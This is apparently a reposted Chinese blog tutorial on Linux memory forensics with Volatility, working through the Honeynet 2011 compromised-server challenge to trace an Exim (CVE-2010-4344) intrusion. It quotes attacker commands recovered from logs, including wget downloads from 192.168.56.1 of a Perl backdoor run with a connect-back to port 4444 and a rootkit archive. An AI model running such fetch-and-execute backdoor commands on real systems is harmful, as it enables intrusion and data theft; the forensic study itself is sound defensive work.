第一次 按照大神的博客，完成這個實驗，希望后來者，少入點坑

工具介紹：volatility

volatility是一款開源的內存取證分析工具，由python編寫，支持各種操作系統。可以通過插件來拓展功能。kali下集成了該工具，命令行輸入volatility使用該工具。

Volatility‐f [image]--‐profile=[profile]

[plugin]

--info查看掃描檢查、插件、地址空間等信息

-h查看幫助信息

[plugin]–h指定插件的幫助信息

--output-file=[file]檢查結果輸出

實驗鏡像：

我們在這里即將分析的鏡像是Challenge 7 of the Forensic Challenge 2011–Forensic

Analysis of a Compromised Server的題目，我們可以在https://www.honeynet.org/challenges/2011_7_compromised_server這下載到相應的鏡像文件。

注意：三個都要下載。

第一步分析鏡像文件

分析鏡像文件，我們可以通過掛載的方式，來確定鏡像的系統的版本，我們才可以制作相應的profile，或者搜索相應的profile。

我們先掛載鏡像mount -o loop victoria-v8.sda1.img /mnt將鏡像掛載到/mnt。

切換到/mnt目錄

cd /mnt

我們可以看到相應的系統文件。

cat /mnt/etc/issue

查看系統版本

鏡像系統版本是Debian發行版5.0

在var/log目錄下，

cat dmesg

系統內核版本是2.6.26。

PS：dmesg用來顯示開機信息，kernel會將開機信息存儲在ring

buffer中。您若是開機時來不及查看信息，可利用dmesg來查看。開機信息亦保存在/var/log目錄中，名稱為dmesg的文件里。

第二步

獲取相應profile

我們有兩種方法獲取profile。

第一，我們可以創建我們自己的profile。

Volatility自帶一些windows系統的profile，Linux系統的Profile需要自己制作，制作的方法如下：

(實際是將module.dwarf和system.map打包成一個zip文件，接著將zip文件移動到volatility/plugins/overlays/linux/中。)

Linux的Profile文件是一個zip的壓縮包。

第二，我們可以利用搜索引擎或者已公開的profile，例如，我們就可以看到一些已經公布的profile。我這里使用的是第二種方法，在公開的項目中找到了Debian 5.0的profile.參考網址：

緊接著，我們需要將profile放入對應的位置：

注意：坑：

kali2.0,中volatility已經安裝了，這個profile的插件應該放在python的安裝目錄中，參考我的放置目錄：

/usr/lib/python2.7/dist-packages/volatility/plugins/overlays/linux/

通過volatility --info測試

測試前

測試后

第三步

開始分析文件

volatility -f ./victoria-v8.sda1.img

--profile=LinuxDebian5010x86 -h

可以看到針對linux鏡像的命令，以及相應功能介紹。

通過

volatility -f ./victoria-v8.memdump.img

--profile=LinuxDebian5010x86 linux_psaux

我們可以查看進程。

可疑連接

通過

volatility -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86

linux_netstat

我們可以查看各種網絡相關信息,如網絡連接,路由表,接口狀態

等。

volatility -f ./victoria-v8.memdump.img ?--profile=LinuxDebian5010x86 linux_bash

scp命令復制了exim4目錄下的所有文件，

scp是linux系統下基于ssh登陸進行安全的遠程文件拷貝命令。

我們在/mnt/var/log/exim4目錄下的Exim reject log中看到，

Wget：下載并保存

wget http://192.168.56.1/c.pl -O /tmp/c.pl

wget http://192.168.56.1/rk.tar -O

/tmp/rk.tar; sleep 1000

查看兩個文件

.pl的簡單分析表明，它是一個perl腳本，用于創建一個c程序，該程序編譯給支持SUID的可執行文件打開一個后門并向攻擊者發送信息。

c.pl被下載，并且編譯的SUID在端口4444中打開了一個到192.168.56.1的連接，如下所示：

wget http://192.168.56.1/c.pl -O /tmp/c.pl;

perl /tmp/c.pl 192.168.56.1 4444

繼續回到bash分析：

python vol.py -f

./victoria-v8.memdump.img –profile=LinuxDebian5010x86 linux_bash

攻擊者將 /dev/sda1整個dump下來，并通過 8888端口發送了出去。

Exim reject日志顯示IP 192.168.56.101作為要發送郵件的主機：

abcde.com，owned.org和h0n3yn3t-pr0j3ct.com

python?vol.py?-f?./victoria-v8.memdump.img?--profile=LinuxDebian5010x86?linux_netstat我們發現有兩個已經關閉的連接。

基本上證明了，192.168.56.101也是一個攻擊IP。

我們之后通過上面的信息，知道攻擊者是通過Exim成功攻擊了這臺服務器。通過搜索exim相關的漏洞我們基本可以確定

攻擊是CVE-2010-4344

此外，我們知道攻擊者成功攻擊了此臺服務器

但是我們從cat?/mnt/var/log/auth.log?|grep?Failed中看到攻擊者一直嘗試以Ulysses的賬戶名登錄，卻沒登錄成功。

總結：

?攻擊者可能只是一個腳本小子，利用已有的cve公布了的exp進入到了系統并沒有成功登錄賬戶其次

通過分析，我們可以知道攻擊的發起

以及結束 并且我們了解到攻擊者簡單嘗試了登錄賬戶32次后就放棄了。

總結

以上是生活随笔為你收集整理的kali 安装volatility_volatility取证学习-linux的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。